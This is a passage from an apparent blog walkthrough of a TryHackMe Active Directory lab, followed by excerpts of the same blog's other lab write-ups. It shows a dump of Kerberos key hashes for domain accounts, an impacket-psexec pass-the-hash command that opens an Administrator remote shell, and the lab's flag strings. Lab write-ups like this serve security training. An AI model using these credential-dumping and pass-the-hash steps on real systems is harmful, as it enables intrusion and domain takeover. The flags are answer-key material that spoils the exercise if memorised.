spookysec.local\darkstar:des-cbc-md5:758af4d061381cea
spookysec.local\Ori:aes256-cts-hmac-sha1-96:5534c1b0f98d82219ee4c1cc63cfd73a9416f5f6acfb88bc2bf2e54e94667067
spookysec.local\Ori:aes128-cts-hmac-sha1-96:5ee50856b24d48fddfc9da965737a25e
spookysec.local\Ori:des-cbc-md5:1c8f79864654cd4a
spookysec.local\robin:aes256-cts-hmac-sha1-96:8776bd64fcfcf3800df2f958d144ef72473bd89e310d7a6574f4635ff64b40a3
spookysec.local\robin:aes128-cts-hmac-sha1-96:733bf907e518d2334437eacb9e4033c8
spookysec.local\robin:des-cbc-md5:89a7c2fe7a5b9d64
spookysec.local\paradox:aes256-cts-hmac-sha1-96:64ff474f12aae00c596c1dce0cfc9584358d13fba827081afa7ae2225a5eb9a0
spookysec.local\paradox:aes128-cts-hmac-sha1-96:f09a5214e38285327bb9a7fed1db56b8
spookysec.local\paradox:des-cbc-md5:83988983f8b34019
spookysec.local\Muirland:aes256-cts-hmac-sha1-96:81db9a8a29221c5be13333559a554389e16a80382f1bab51247b95b58b370347
spookysec.local\Muirland:aes128-cts-hmac-sha1-96:2846fc7ba29b36ff6401781bc90e1aaa
spookysec.local\Muirland:des-cbc-md5:cb8a4a3431648c86
spookysec.local\horshark:aes256-cts-hmac-sha1-96:891e3ae9c420659cafb5a6237120b50f26481b6838b3efa6a171ae84dd11c166
spookysec.local\horshark:aes128-cts-hmac-sha1-96:c6f6248b932ffd75103677a15873837c
spookysec.local\horshark:des-cbc-md5:a823497a7f4c0157
spookysec.local\svc-admin:aes256-cts-hmac-sha1-96:effa9b7dd43e1e58db9ac68a4397822b5e68f8d29647911df20b626d82863518
spookysec.local\svc-admin:aes128-cts-hmac-sha1-96:aed45e45fda7e02e0b9b0ae87030b3ff
spookysec.local\svc-admin:des-cbc-md5:2c4543ef4646ea0d
spookysec.local\backup:aes256-cts-hmac-sha1-96:23566872a9951102d116224ea4ac8943483bf0efd74d61fda15d104829412922
spookysec.local\backup:aes128-cts-hmac-sha1-96:843ddb2aec9b7c1c5c0bf971c836d197
spookysec.local\backup:des-cbc-md5:d601e9469b2f6d89
spookysec.local\a-spooks:aes256-cts-hmac-sha1-96:cfd00f7ebd5ec38a5921a408834886f40a1f40cda656f38c93477fb4f6bd1242
spookysec.local\a-spooks:aes128-cts-hmac-sha1-96:31d65c2f73fb142ddc60e0f3843e2f68
spookysec.local\a-spooks:des-cbc-md5:e09e4683ef4a4ce9
ATTACKTIVEDIREC$:aes256-cts-hmac-sha1-96:b0ac624569c79015d3b836b64458f9039d072a1eab582c3fa3274dc94752f0cf
ATTACKTIVEDIREC$:aes128-cts-hmac-sha1-96:d0f5f147c4121e6f4ff0cb30cbd77583
ATTACKTIVEDIREC$:des-cbc-md5:3d4f6d61f71cf72a
[*] Cleaning up...

Using psexec to obtain a remote shell on the target system as the Administrator user by providing their NTLM hash with the command you can see below.

┌──(root💀kali)-[/home/kali/Downloads/kerbrute]
└─# impacket-psexec Administrator:@spookysec.local -hashes aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Requesting shares on spookysec.local.....
[*] Found writable share ADMIN$
[*] Uploading file nYatAmbq.exe
[*] Opening SVCManager on spookysec.local.....
[*] Creating service vJod on spookysec.local.....
[*] Starting service vJod.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1490]
(c) 2018 Microsoft Corporation. All rights reserved.

Now we have to obtain the user flag and root flag that normally is discovered in path which is C:\Users\User\Desktop\user.txt.

For it let's go to move by the path and discover the flags.

C:\Windows\system32>
C:\Windows\system32> cd ..
C:\Windows> cd ..
C:\> cd Users
C:\Users> dir
Volume in drive C has no label.
Volume Serial Number is EEA6-70E8
Directory of C:\Users

09/17/2020 04:03 PM <DIR> .
09/17/2020 04:03 PM <DIR> ..
09/17/2020 04:04 PM <DIR> a-spooks
09/17/2020 04:02 PM <DIR> Administrator
04/04/2020 12:19 PM <DIR> backup
04/04/2020 01:07 PM <DIR> backup.THM-AD
04/04/2020 11:19 AM <DIR> Public
04/04/2020 12:18 PM <DIR> svc-admin
0 File(s) 0 bytes
8 Dir(s) 14,711,631,872 bytes free

C:\Users> cd svc-admin
C:\Users\svc-admin> dir
Volume in drive C has no label.
Volume Serial Number is EEA6-70E8

Directory of C:\Users\svc-admin

04/04/2020 12:18 PM <DIR> .
04/04/2020 12:18 PM <DIR> ..
04/04/2020 12:18 PM <DIR> 3D Objects
04/04/2020 12:18 PM <DIR> Contacts
04/04/2020 12:18 PM <DIR> Desktop
04/04/2020 12:18 PM <DIR> Documents
04/04/2020 12:18 PM <DIR> Downloads
04/04/2020 12:18 PM <DIR> Favorites
04/04/2020 12:18 PM <DIR> Links
04/04/2020 12:18 PM <DIR> Music
04/04/2020 12:18 PM <DIR> Pictures
04/04/2020 12:18 PM <DIR> Saved Games
04/04/2020 12:18 PM <DIR> Searches
04/04/2020 12:18 PM <DIR> Videos
0 File(s) 0 bytes
14 Dir(s) 14,708,277,248 bytes free

C:\Users\svc-admin> cd Desktop
C:\Users\svc-admin\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is EEA6-70E8

Directory of C:\Users\svc-admin\Desktop

04/04/2020 12:18 PM <DIR> .
04/04/2020 12:18 PM <DIR> ..
04/04/2020 12:18 PM 28 user.txt.txt
1 File(s) 28 bytes
2 Dir(s) 14,701,268,992 bytes free

We have discovered the first flag which is located in C:\Users\svc-admin\Desktop and as we have to see we have to execute type command and user.txt.txt file.

Directory of C:\Users\svc-admin\Desktop

04/04/2020 12:18 PM <DIR> .
04/04/2020 12:18 PM <DIR> ..
04/04/2020 12:18 PM 28 user.txt.txt
1 File(s) 28 bytes
2 Dir(s) 14,701,268,992 bytes free

C:\Users\svc-admin\Desktop> type user.txt.txt
TryHackMe{K3rb3r0s_Pr3_4uth}
C:\Users\svc-admin\Desktop> cd ..
C:\Users\svc-admin> cd ..
C:\Users> dir
Volume in drive C has no label.
Volume Serial Number is EEA6-70E8

Directory of C:\Users

09/17/2020 04:03 PM <DIR> .
09/17/2020 04:03 PM <DIR> ..
09/17/2020 04:04 PM <DIR> a-spooks
09/17/2020 04:02 PM <DIR> Administrator
04/04/2020 12:19 PM <DIR> backup
04/04/2020 01:07 PM <DIR> backup.THM-AD
04/04/2020 11:19 AM <DIR> Public
04/04/2020 12:18 PM <DIR> svc-admin
0 File(s) 0 bytes
8 Dir(s) 14,700,740,608 bytes free

C:\Users> cd backup
C:\Users\backup> dir
Volume in drive C has no label.
Volume Serial Number is EEA6-70E8

Directory of C:\Users\backup

04/04/2020 12:19 PM <DIR> .
04/04/2020 12:19 PM <DIR> ..
04/04/2020 12:19 PM <DIR> 3D Objects
04/04/2020 12:19 PM <DIR> Contacts
04/04/2020 12:19 PM <DIR> Desktop
04/04/2020 12:19 PM <DIR> Documents
04/04/2020 12:19 PM <DIR> Downloads
04/04/2020 12:19 PM <DIR> Favorites
04/04/2020 12:19 PM <DIR> Links
04/04/2020 12:19 PM <DIR> Music
04/04/2020 12:19 PM <DIR> Pictures
04/04/2020 12:19 PM <DIR> Saved Games
04/04/2020 12:19 PM <DIR> Searches
04/04/2020 12:19 PM <DIR> Videos
0 File(s) 0 bytes
14 Dir(s) 14,700,478,464 bytes free

C:\Users\backup> cd Desktop
C:\Users\backup\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is EEA6-70E8

Directory of C:\Users\backup\Desktop

04/04/2020 12:19 PM <DIR> .
04/04/2020 12:19 PM <DIR> ..
04/04/2020 12:19 PM 26 PrivEsc.txt
1 File(s) 26 bytes
2 Dir(s) 14,700,478,464 bytes free

C:\Users\backup\Desktop> dir PrivEsc.txt
Volume in drive C has no label.
Volume Serial Number is EEA6-70E8

Directory of C:\Users\backup\Desktop

04/04/2020 12:19 PM 26 PrivEsc.txt
1 File(s) 26 bytes
0 Dir(s) 14,700,335,104 bytes free

This is not the root flag and we have to find more.

C:\Users\backup\Desktop> type PrivEsc.txt
TryHackMe{B4ckM3UpSc0tty!}
C:\Users\backup\Desktop>
C:\Users> cd Administrator
C:\Users\Administrator> dir
Volume in drive C has no label.
Volume Serial Number is EEA6-70E8

Directory of C:\Users\Administrator

09/17/2020 04:02 PM <DIR> .
09/17/2020 04:02 PM <DIR> ..
04/04/2020 11:19 AM <DIR> 3D Objects
04/04/2020 11:19 AM <DIR> Contacts
04/04/2020 11:39 AM <DIR> Desktop
04/04/2020 12:09 PM <DIR> Documents
04/04/2020 11:19 AM <DIR> Downloads
04/04/2020 11:19 AM <DIR> Favorites
04/04/2020 11:19 AM <DIR> Links
04/04/2020 11:19 AM <DIR> Music
04/04/2020 11:19 AM <DIR> Pictures
04/04/2020 11:19 AM <DIR> Saved Games
04/04/2020 11:19 AM <DIR> Searches
04/04/2020 11:19 AM <DIR> Videos
0 File(s) 0 bytes
14 Dir(s) 14,695,067,648 bytes free

C:\Users\Administrator> cd Desktop
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is EEA6-70E8

We have discovered the first flag which is located in C:\Users\Adminsitrator\Desktop and as we have to see we have to execute type command and root.txt file.

Directory of C:\Users\Administrator\Desktop

04/04/2020 11:39 AM <DIR> .
04/04/2020 11:39 AM <DIR> ..
04/04/2020 11:39 AM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 14,695,067,648 bytes free

C:\Users\Administrator\Desktop> type root.txt
TryHackMe{4ctiveD1rectoryM4st3r}

Thank you very much for reading this article

I hope you liked and learned something new

This article has been done with ethical proposes

Good Hack

Comments

Post a Comment

Entradas Populares

INTERNAL

Image
 INTERNAL(TRYHACKME) First of all, let's go execute nmap command to identify alives ports and version with this host 192.168.88.6 as you can see below. Key open ports and services include: Web Servers: Port 80 (HTTP):  Running  Apache2 Ubuntu Default Page . It supports  OPTIONS ,  TRACE  (flagged as potentially risky),  GET ,  HEAD , and  POST  methods. The webpage title is " INTERNAL ". SSH Protocol Port 22 (SSH): Running Linux . ┌──(root㉿kali)-[/home/luis/Descargas] └─# nmap -n -Pn -p- --min-rate 5000 -sC 10.10.216.78 -vvv Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-07 12:06 CEST NSE: Loaded 126 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 2) scan. Initiating NSE at 12:06 Completed NSE at 12:06, 0.00s elapsed NSE: Starting runlevel 2 (of 2) scan. Initiating NSE at 12:06 Completed NSE at 12:06, 0.00s elapsed Initiating SYN Stealth Scan at 12:06 Scanning 10.10.216.78 [65535 ports] Discove...
Read more »

TOR WEB BROWSER

Image
  TOR WEB BROWSER TOR INSTALLATION First of all; we're going to this link from the oficial webpage: https://www.torproject.org/es/download/   where we have to download this version our laptop, Windows and Linux but in my case I've had to download for Windows 10. When the program is installed we will press execute and we'll follow step by step:   We'll open and we'll see this image where you have to select the language and select ok to continue the instal l ation. In addition, we'll select the location wherever you want install the program, but in my case I prefer the default location and you'll able to select wherever you want. Now, we will be started the installation process and when it finished you will be able to see the picture below: TOR CONNECT If the process has been successful, you will be able to connect with the connect button which you can observe in both pictures below: ADD A BRIDGE ...
Read more »

PICKLE RICK

Image
  PICKLE RICK I'm going to realize the resolution of the machine Level Easy from Tryhackme called  Pickle Rick  which is a machine so easy to realize. First of all,  we can observe that in the picture bellow we have some inforamtion and I'm going to execute control +u  and we can see in the second picture below that we've obtained a  Username. I'm going to gathering information about machine and I have to enter in the Linux terminal and I must introduce this command which you canobserve in the picture below:   gobuster dir -u(url) http://10.10.99.188/ -w(password dictionary)  /usr/share/wordlist/dirb/common.txt -x (formato que quereos que busque) .txt*, .php, .login,  In this case, we can observe that scan has discovered this 4 webpages: /assests /denied.php /index.html /login.php /robots.txt Now, we can see such as the web page from /robots.txt   it seems the password in the picture below. Now, we've discovered this login web page...
Read more »

Metasploit Framework

Image
 METASPLOIT FRAMEWORK USE TO  AUXILIARY MODULE FROM METASPLOIT First of all, I have used the auxiliary modules from Metasploit-Framework which could allow me Scanning, see ports, SO version, vulnerability in applications etc, where you can see at the bottom of the picture if  I use this module whose name is: auxiliary/scanner/discovery/arp_sweep  (To verify the IPs listening in the network) Now, we can observe that when I have selected in the auxiliary module I have had to do this set up  that we can observe in the second page below: INTERFACE : This I've set up the network interface that in my case is the eth0 interface. RHOSTS :This I've set up the IP Address which I am finding out that in my case is 192.168.100.0/24 (all the IP Address from network that could be possible which I am analyzing). THREADS : Are the threads; it's the fast  that I want to analyze the IP Addresses but in my case there are 15 threads because I want to analize as fast as possible...
Read more »

HOSTING

Image
HOSTING First of all, let's go to hosting machine from active directory, for it  using arp-scan to discover active hosts on the local network, identifying 192.168.88.8 as you can see in below. ┌──(kali㉿kali)-[~] └─$ sudo arp-scan -I eth0 --localnet Interface: eth0, type: EN10MB, MAC: 08:00:27:43:73:bc, IPv4: 192.168.88.5 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.88.1 d8:44:89:50:2d:a3 (Unknown) 192.168.88.8 08:00:27:98:d4:bf PCS Systemtechnik GmbH 192.168.88.9 00:e0:4c:69:66:4a REALTEK SEMICONDUCTOR CORP. 3 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 2.075 seconds (123.37 hosts/sec). 3 responded ┌──(kali㉿kali)-[~] └─$ ping -c1 192.168.88.8 PING 192.168.88.8 (192.168.88.8) 56(84) bytes of data. 64 bytes from 192.168.88.8: icmp_seq=1 ttl=128...
Read more »

LOVE

Image
BUSCALOVE First of all, I am going to do this machine from cybersecurity labs called BuscaLove which is easy Level. For it, let’s go to open Linux terminal and we have to write the command when we can see in the picture below. cd Descargas In addition, we have to depress the unzip file whose name’s buscalove.zip you can see in the picture below. Now we have to deploy the vulnerability machine whose command is sudo bash auto_deploy.sh buscalove.tar we can see in the picture below. On the other hand, to start the attack at virtual machine, we must verify if the attacker machine is in the same range of IP Address and we have to introduce this command which is ping -c 3 172.18.0.2 we can see in the picture below. As I,ve just seen the IP Address it’s in the same range of my IP Address we have to introduce the command with nmap tool which is nmap -n -Pn 172.18.0.2 -p- - -min-rate 4000 -vvv( here you can see in this picture the scanner) but I’ve got it 2 ports: 22: open ssh 80: open http No...
Read more »

CHANGE MACHINE

Image
CHANGE  First of all, let's go to hosting machine from active directory, for it  using  arp-scan  to discover active hosts on the local network, identifying  192.168.88.8   as you can see in below . ┌──(root㉿kali)-[/home/luis] └─# arp-scan -I eth0 --localnet Interface: eth0, type: EN10MB, MAC: 08:00:27:4d:8a:0f, IPv4: 192.168.88.6 WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.88.1 d8:44:89:50:2d:a3 (Unknown) 192.168.88.4 00:e0:4c:97:01:a7 (Unknown) 192.168.88.5 00:d8:61:fa:c0:4a (Unknown) 192.168.88.7 08:00:27:b1:ae:9f (Unknown) 4 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 1.848 seconds (138.53 hosts/sec). 4 responded Now, let's go execute nmap command to identify alives ports and version with this host  192.168.88...
Read more »